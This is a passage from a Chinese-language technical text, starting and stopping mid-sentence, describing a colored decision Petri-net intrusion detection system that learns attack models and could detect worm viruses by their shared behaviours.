etri網(wǎng)是對(duì)異步并發(fā)系統(tǒng)進(jìn)行建模與分析的有力工具。所謂判決NP機(jī)就是具有輸入設(shè)輸出集且行為表達(dá)式是一個(gè)定序并發(fā)表達(dá)式的確定PN機(jī)。著色PN機(jī)就是為位置和變遷加上稱為顏色的標(biāo)識(shí)，這些標(biāo)識(shí)帶有數(shù)據(jù)值，從而可以相互區(qū)分不同的事件?；诠粜袨榈闹袥QPN機(jī)入侵檢測(cè)系統(tǒng)通過著色判決PN機(jī)對(duì)攻擊行為進(jìn)行分析和建模，系統(tǒng)首先根據(jù)攻擊實(shí)例表示成并發(fā)表達(dá)式，再轉(zhuǎn)化為判決PN機(jī)模型，然后使用機(jī)器學(xué)習(xí)的方法，通過對(duì)模型進(jìn)行歸納學(xué)習(xí)得到攻擊行為的概念空間，使得系統(tǒng)能夠在某種程度上(基于同一弱點(diǎn)或相似行為的攻擊)對(duì)付未知攻擊模式，從而實(shí)現(xiàn)攻擊知識(shí)庫的更新和擴(kuò)展。利用著色判決PN機(jī)的有色合成操作，可以對(duì)多個(gè)模型合一，從而解決多模式匹配問題，使得系統(tǒng)能夠在模型增加的同時(shí)保持檢測(cè)的高效率。蠕蟲病毒與黑客入侵具有相似性，基于攻擊行為的著色判決PN機(jī)入侵檢測(cè)系統(tǒng)完全可以檢測(cè)蠕蟲病毒。瓊斯病毒雖然能夠產(chǎn)生行為特征各異的子病毒，但這類子病毒既然是蠕蟲病毒就會(huì)具有蠕蟲病毒的共性，諸如自身復(fù)制、為了能夠自啟動(dòng)而修改注冊(cè)表、打開端口連接其他計(jì)算機(jī)等，這些特征從理論上來講都會(huì)被基于攻擊行為的著色判決PN機(jī)入侵檢測(cè)系統(tǒng)